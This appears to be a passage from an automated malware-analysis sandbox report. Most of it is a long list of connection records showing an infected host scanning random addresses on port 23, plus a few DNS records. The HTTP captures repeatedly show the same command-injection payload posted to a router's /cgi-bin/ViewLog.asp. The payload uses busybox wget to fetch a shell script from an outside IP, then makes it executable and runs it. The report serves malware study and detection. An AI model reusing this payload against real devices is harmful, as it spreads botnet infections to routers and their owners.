                                                        Feb 14, 2024 09:32:45.808476925 CET3332323192.168.2.14171.218.102.150
                                                        Feb 14, 2024 09:32:45.808481932 CET3332323192.168.2.14196.200.19.178
                                                        Feb 14, 2024 09:32:45.808487892 CET3332323192.168.2.1412.86.192.25
                                                        Feb 14, 2024 09:32:45.808499098 CET3332323192.168.2.14167.167.113.32
                                                        Feb 14, 2024 09:32:45.808510065 CET3332323192.168.2.14137.202.87.92
                                                        Feb 14, 2024 09:32:45.808511019 CET3332323192.168.2.1453.5.214.252
                                                        Feb 14, 2024 09:32:45.808511019 CET3332323192.168.2.1497.83.60.255
                                                        Feb 14, 2024 09:32:45.808511019 CET3332323192.168.2.1417.14.114.16
                                                        Feb 14, 2024 09:32:45.808514118 CET3332323192.168.2.14167.220.136.34
                                                        Feb 14, 2024 09:32:45.808515072 CET333232323192.168.2.14204.104.247.181
                                                        Feb 14, 2024 09:32:45.808515072 CET3332323192.168.2.14223.68.171.29
                                                        Feb 14, 2024 09:32:45.808515072 CET3332323192.168.2.144.169.207.155
                                                        Feb 14, 2024 09:32:45.808523893 CET3332323192.168.2.14203.76.117.179
                                                        Feb 14, 2024 09:32:45.808533907 CET3332323192.168.2.144.1.105.205
                                                        Feb 14, 2024 09:32:45.808536053 CET3332323192.168.2.14205.91.134.249
                                                        Feb 14, 2024 09:32:45.808537960 CET3332323192.168.2.1472.207.189.191
                                                        Feb 14, 2024 09:32:45.808548927 CET3332323192.168.2.14116.61.148.78
                                                        Feb 14, 2024 09:32:45.808548927 CET3332323192.168.2.144.211.144.172
                                                        Feb 14, 2024 09:32:45.808548927 CET3332323192.168.2.1498.216.232.204
                                                        Feb 14, 2024 09:32:45.808563948 CET3332323192.168.2.14125.101.109.172
                                                        Feb 14, 2024 09:32:45.808572054 CET333232323192.168.2.14164.216.255.176
                                                        Feb 14, 2024 09:32:45.808572054 CET3332323192.168.2.14217.167.185.141
                                                        Feb 14, 2024 09:32:45.808587074 CET3332323192.168.2.14186.212.186.8
                                                        Feb 14, 2024 09:32:45.808590889 CET3332323192.168.2.1468.43.231.193
                                                        Feb 14, 2024 09:32:45.808594942 CET3332323192.168.2.14114.55.22.174
                                                        Feb 14, 2024 09:32:45.808599949 CET3332323192.168.2.14118.199.104.214
                                                        Feb 14, 2024 09:32:45.808612108 CET3332323192.168.2.14126.104.220.159
                                                        Feb 14, 2024 09:32:45.808619022 CET3332323192.168.2.14171.205.33.197
                                                        Feb 14, 2024 09:32:45.808639050 CET3332323192.168.2.14200.109.202.74
                                                        Feb 14, 2024 09:32:45.808645010 CET3332323192.168.2.1469.119.198.190
                                                        Feb 14, 2024 09:32:45.808654070 CET333232323192.168.2.1446.140.249.57
                                                        Feb 14, 2024 09:32:45.808654070 CET3332323192.168.2.14131.205.57.223
                                                        Feb 14, 2024 09:32:45.808655024 CET3332323192.168.2.149.191.28.82
                                                        Feb 14, 2024 09:32:45.808665037 CET3332323192.168.2.14196.55.163.86
                                                        Feb 14, 2024 09:32:45.808677912 CET3332323192.168.2.1476.78.209.200
                                                        Feb 14, 2024 09:32:45.808681011 CET3332323192.168.2.14114.152.229.253
                                                        Feb 14, 2024 09:32:45.808686972 CET3332323192.168.2.14191.74.121.210
                                                        Feb 14, 2024 09:32:45.808706999 CET3332323192.168.2.14105.217.5.242
                                                        Feb 14, 2024 09:32:45.808707952 CET3332323192.168.2.14221.201.16.13
                                                        Feb 14, 2024 09:32:45.808707952 CET333232323192.168.2.1438.241.121.56
                                                        Feb 14, 2024 09:32:45.808713913 CET3332323192.168.2.14119.206.68.67
                                                        Feb 14, 2024 09:32:45.808726072 CET3332323192.168.2.149.123.239.107
                                                        Feb 14, 2024 09:32:45.808732033 CET3332323192.168.2.14105.239.165.183
                                                        Feb 14, 2024 09:32:45.808737993 CET3332323192.168.2.14217.207.177.249
                                                        Feb 14, 2024 09:32:45.808748960 CET3332323192.168.2.1467.172.183.55
                                                        Feb 14, 2024 09:32:45.808763027 CET3332323192.168.2.1418.170.154.38
                                                        Feb 14, 2024 09:32:45.808763981 CET3332323192.168.2.1427.222.252.180
                                                        Feb 14, 2024 09:32:45.808773041 CET3332323192.168.2.14139.73.21.51
                                                        Feb 14, 2024 09:32:45.808788061 CET3332323192.168.2.14162.6.168.24
                                                        Feb 14, 2024 09:32:45.808789015 CET3332323192.168.2.14150.226.219.208
                                                        Feb 14, 2024 09:32:45.808789015 CET333232323192.168.2.14100.128.180.236
                                                        Feb 14, 2024 09:32:45.808801889 CET3332323192.168.2.14198.214.226.119
                                                        Feb 14, 2024 09:32:45.808801889 CET3332323192.168.2.1437.176.186.3
                                                        Feb 14, 2024 09:32:45.808814049 CET3332323192.168.2.1458.121.231.8
                                                        Feb 14, 2024 09:32:45.808828115 CET3332323192.168.2.14180.188.92.116
                                                        Feb 14, 2024 09:32:45.808829069 CET3332323192.168.2.1477.201.121.207
                                                        Feb 14, 2024 09:32:45.808828115 CET3332323192.168.2.14179.241.192.16
                                                        Feb 14, 2024 09:32:45.808829069 CET3332323192.168.2.1434.1.93.184
                                                        Feb 14, 2024 09:32:45.808842897 CET3332323192.168.2.14167.251.0.98
                                                        Feb 14, 2024 09:32:45.808851004 CET3332323192.168.2.1478.122.80.182
                                                        Feb 14, 2024 09:32:45.808852911 CET333232323192.168.2.1423.108.3.35
                                                        Feb 14, 2024 09:32:45.808862925 CET3332323192.168.2.14113.71.24.229
                                                        Feb 14, 2024 09:32:45.808866978 CET3332323192.168.2.1417.12.24.238
                                                        Feb 14, 2024 09:32:45.808880091 CET3332323192.168.2.14108.121.173.234
                                                        Feb 14, 2024 09:32:45.808887959 CET3332323192.168.2.14149.213.50.2
                                                        Feb 14, 2024 09:32:45.808892965 CET3332323192.168.2.14202.197.12.173
                                                        Feb 14, 2024 09:32:45.808902979 CET3332323192.168.2.1467.107.11.52
                                                        Feb 14, 2024 09:32:45.808907986 CET3332323192.168.2.14107.120.247.77
                                                        Feb 14, 2024 09:32:45.808907986 CET3332323192.168.2.14203.65.103.203
                                                        Feb 14, 2024 09:32:45.808911085 CET3332323192.168.2.14189.111.129.142
                                                        Feb 14, 2024 09:32:45.808911085 CET333232323192.168.2.14198.47.244.85
                                                        Feb 14, 2024 09:32:45.808921099 CET3332323192.168.2.1498.108.84.27
                                                        Feb 14, 2024 09:32:45.808921099 CET3332323192.168.2.14108.197.113.253
                                                        Feb 14, 2024 09:32:45.808928967 CET3332323192.168.2.14155.21.183.207
                                                        Feb 14, 2024 09:32:45.808938980 CET3332323192.168.2.14156.173.12.13
                                                        Feb 14, 2024 09:32:45.808948994 CET3332323192.168.2.14219.54.91.49
                                                        Feb 14, 2024 09:32:45.808950901 CET3332323192.168.2.1473.150.110.207
                                                        Feb 14, 2024 09:32:45.808958054 CET3332323192.168.2.14148.249.145.75
                                                        Feb 14, 2024 09:32:45.808960915 CET3332323192.168.2.14179.160.142.222
                                                        Feb 14, 2024 09:32:45.808976889 CET3332323192.168.2.14110.139.10.78
                                                        Feb 14, 2024 09:32:45.808984041 CET333232323192.168.2.14220.89.36.225
                                                        Feb 14, 2024 09:32:45.808990955 CET3332323192.168.2.1495.179.237.5
                                                        Feb 14, 2024 09:32:45.808995962 CET3332323192.168.2.1496.131.29.237
                                                        Feb 14, 2024 09:32:45.808995962 CET3332323192.168.2.14178.55.172.226
                                                        Feb 14, 2024 09:32:45.809010983 CET3332323192.168.2.1468.111.90.54
                                                        Feb 14, 2024 09:32:45.809012890 CET3332323192.168.2.14138.78.65.176
                                                        Feb 14, 2024 09:32:45.809022903 CET3332323192.168.2.14151.126.191.24
                                                        Feb 14, 2024 09:32:45.809027910 CET3332323192.168.2.14220.245.113.81
                                                        Feb 14, 2024 09:32:45.809027910 CET3332323192.168.2.14162.47.195.146
                                                        Feb 14, 2024 09:32:45.809035063 CET3332323192.168.2.14182.181.4.92
                                                        Feb 14, 2024 09:32:45.809052944 CET3332323192.168.2.1412.50.21.43
                                                        Feb 14, 2024 09:32:45.809053898 CET333232323192.168.2.1445.96.16.251
                                                        Feb 14, 2024 09:32:45.809056044 CET3332323192.168.2.1450.55.123.12
                                                        Feb 14, 2024 09:32:45.809056997 CET3332323192.168.2.14210.198.132.192
                                                        Feb 14, 2024 09:32:45.809056044 CET3332323192.168.2.1452.73.247.124
                                                        Feb 14, 2024 09:32:45.809073925 CET3332323192.168.2.1478.41.183.18
                                                        Feb 14, 2024 09:32:45.809084892 CET3332323192.168.2.14186.106.209.16
                                                        Feb 14, 2024 09:32:45.809102058 CET3332323192.168.2.14202.201.20.81
                                                        Feb 14, 2024 09:32:45.809102058 CET333232323192.168.2.1434.122.67.176
                                                        Feb 14, 2024 09:32:45.809104919 CET3332323192.168.2.1446.199.0.85
                                                        Feb 14, 2024 09:32:45.809104919 CET3332323192.168.2.142.140.187.122
                                                        Feb 14, 2024 09:32:45.809118986 CET3332323192.168.2.14210.251.32.183
                                                        Feb 14, 2024 09:32:45.809125900 CET3332323192.168.2.14216.205.196.135
                                                        Feb 14, 2024 09:32:45.809127092 CET3332323192.168.2.1440.249.176.50
                                                        Feb 14, 2024 09:32:45.809133053 CET3332323192.168.2.1483.142.178.34
                                                        Feb 14, 2024 09:32:45.809133053 CET3332323192.168.2.14110.12.213.242
                                                        Feb 14, 2024 09:32:45.809150934 CET3332323192.168.2.1450.145.210.187
                                                        Feb 14, 2024 09:32:45.809155941 CET3332323192.168.2.14122.246.160.49
                                                        Feb 14, 2024 09:32:45.809155941 CET3332323192.168.2.14146.181.223.49
                                                        Feb 14, 2024 09:32:45.809165955 CET3332323192.168.2.1454.152.32.109
                                                        Feb 14, 2024 09:32:45.809166908 CET333232323192.168.2.14217.28.163.26
                                                        Feb 14, 2024 09:32:45.809180975 CET3332323192.168.2.14203.185.197.49
                                                        Feb 14, 2024 09:32:45.809186935 CET3332323192.168.2.14171.127.235.89
                                                        Feb 14, 2024 09:32:45.809201956 CET3332323192.168.2.1479.178.22.0
                                                        Feb 14, 2024 09:32:45.809205055 CET3332323192.168.2.14185.172.213.32
                                                        Feb 14, 2024 09:32:45.809211016 CET3332323192.168.2.14115.77.44.131
                                                        Feb 14, 2024 09:32:45.809216976 CET3332323192.168.2.14104.250.223.254
                                                        Feb 14, 2024 09:32:45.809226036 CET3332323192.168.2.14134.190.173.247
                                                        Feb 14, 2024 09:32:45.809235096 CET3332323192.168.2.145.196.33.125
                                                        Feb 14, 2024 09:32:45.809235096 CET3332323192.168.2.1469.23.247.51
                                                        Feb 14, 2024 09:32:45.809258938 CET3332323192.168.2.1443.118.122.9
                                                        Feb 14, 2024 09:32:45.809262037 CET3332323192.168.2.1420.28.96.107
                                                        Feb 14, 2024 09:32:45.809263945 CET333232323192.168.2.14134.179.10.219
                                                        Feb 14, 2024 09:32:45.809282064 CET3332323192.168.2.1420.137.170.220
                                                        Feb 14, 2024 09:32:45.809283018 CET3332323192.168.2.1445.135.168.51
                                                        Feb 14, 2024 09:32:45.809284925 CET3332323192.168.2.1457.212.188.38
                                                        Feb 14, 2024 09:32:45.809298992 CET333232323192.168.2.1459.184.174.201
                                                        Feb 14, 2024 09:32:45.809300900 CET3332323192.168.2.14148.129.103.118
                                                        Feb 14, 2024 09:32:45.809300900 CET3332323192.168.2.14203.183.106.137
                                                        Feb 14, 2024 09:32:45.809300900 CET3332323192.168.2.1467.21.99.237
                                                        Feb 14, 2024 09:32:45.809302092 CET3332323192.168.2.14133.105.187.99
                                                        Feb 14, 2024 09:32:45.809302092 CET3332323192.168.2.14199.151.238.141
                                                        Feb 14, 2024 09:32:45.809313059 CET3332323192.168.2.14196.131.223.158
                                                        Feb 14, 2024 09:32:45.809318066 CET3332323192.168.2.14204.65.218.29
                                                        Feb 14, 2024 09:32:45.809333086 CET3332323192.168.2.14193.131.144.103
                                                        Feb 14, 2024 09:32:45.809333086 CET3332323192.168.2.1451.8.63.201
                                                        Feb 14, 2024 09:32:45.809333086 CET3332323192.168.2.14141.61.235.176
                                                        Feb 14, 2024 09:32:45.809349060 CET3332323192.168.2.14124.208.23.178
                                                        Feb 14, 2024 09:32:45.809349060 CET3332323192.168.2.14193.248.110.227
                                                        Feb 14, 2024 09:32:45.809350967 CET3332323192.168.2.14144.210.122.41
                                                        Feb 14, 2024 09:32:45.809360027 CET333232323192.168.2.1499.217.243.104
                                                        Feb 14, 2024 09:32:45.809372902 CET3332323192.168.2.1445.249.106.26
                                                        Feb 14, 2024 09:32:45.809380054 CET3332323192.168.2.1453.9.223.36
                                                        Feb 14, 2024 09:32:45.809382915 CET3332323192.168.2.14183.128.125.211
                                                        Feb 14, 2024 09:32:45.809384108 CET3332323192.168.2.14160.101.120.165
                                                        Feb 14, 2024 09:32:45.809391975 CET3332323192.168.2.14151.206.112.24
                                                        Feb 14, 2024 09:32:45.809392929 CET3332323192.168.2.14133.190.25.226
                                                        Feb 14, 2024 09:32:45.809393883 CET3332323192.168.2.14131.139.93.13
                                                        Feb 14, 2024 09:32:45.809406996 CET3332323192.168.2.1427.254.147.83
                                                        Feb 14, 2024 09:32:45.809415102 CET333232323192.168.2.14135.22.15.215
                                                        Feb 14, 2024 09:32:45.809413910 CET3332323192.168.2.1417.119.107.198
                                                        Feb 14, 2024 09:32:45.809425116 CET3332323192.168.2.1494.208.130.43
                                                        Feb 14, 2024 09:32:45.809438944 CET3332323192.168.2.14179.189.26.180
                                                        Feb 14, 2024 09:32:45.809439898 CET3332323192.168.2.1494.84.193.85
                                                        Feb 14, 2024 09:32:45.809456110 CET3332323192.168.2.14208.8.113.214
                                                        Feb 14, 2024 09:32:45.809461117 CET3332323192.168.2.148.21.157.230
                                                        Feb 14, 2024 09:32:45.809461117 CET3332323192.168.2.14149.115.24.245
                                                        Feb 14, 2024 09:32:45.809463024 CET3332323192.168.2.14170.98.169.193
                                                        Feb 14, 2024 09:32:45.809464931 CET3332323192.168.2.1498.208.70.234
                                                        Feb 14, 2024 09:32:45.809480906 CET3332323192.168.2.1446.44.101.63
                                                        Feb 14, 2024 09:32:45.809483051 CET333232323192.168.2.1463.115.85.155
                                                        Feb 14, 2024 09:32:45.809488058 CET3332323192.168.2.14147.171.251.177
                                                        Feb 14, 2024 09:32:45.809495926 CET3332323192.168.2.14104.135.29.53
                                                        Feb 14, 2024 09:32:45.809509993 CET3332323192.168.2.14192.39.143.231
                                                        Feb 14, 2024 09:32:45.815974951 CET803793495.100.79.210192.168.2.14
                                                        Feb 14, 2024 09:32:45.816004038 CET803793495.100.79.210192.168.2.14
                                                        Feb 14, 2024 09:32:45.816080093 CET3793480192.168.2.1495.100.79.210
                                                        Feb 14, 2024 09:32:45.850780010 CET805502095.111.248.64192.168.2.14
                                                        Feb 14, 2024 09:32:45.850838900 CET805502095.111.248.64192.168.2.14
                                                        Feb 14, 2024 09:32:45.850956917 CET5502080192.168.2.1495.111.248.64
                                                        Feb 14, 2024 09:32:45.857975960 CET804461695.100.112.91192.168.2.14
                                                        Feb 14, 2024 09:32:45.858064890 CET4461680192.168.2.1495.100.112.91
                                                        Feb 14, 2024 09:32:45.877731085 CET8036392112.49.54.198192.168.2.14

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Feb 14, 2024 09:35:27.747745991 CET192.168.2.148.8.8.80x9fddStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                        Feb 14, 2024 09:35:27.850204945 CET192.168.2.148.8.8.80x3af8Standard query (0)daisy.ubuntu.com28IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Feb 14, 2024 09:35:27.850342035 CET8.8.8.8192.168.2.140x9fddNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                                        Feb 14, 2024 09:35:27.850342035 CET8.8.8.8192.168.2.140x9fddNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        0192.168.2.144792031.136.7.1058080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:44.025331020 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:44.682053089 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:45.961929083 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:48.617712975 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:53.737585068 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:03.977092981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:25.480328083 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:06.438632011 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1192.168.2.143636685.218.172.128080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:44.053482056 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:44.290224075 CET626INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 431
                                                        Date: Wed, 14 Feb 2024 08:32:43 GMT
                                                        Keep-Alive: timeout=5
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2192.168.2.145139462.29.24.2498080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:44.067312956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3192.168.2.144964294.121.18.1148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:44.067312956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4192.168.2.144068294.123.78.598080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:44.067357063 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


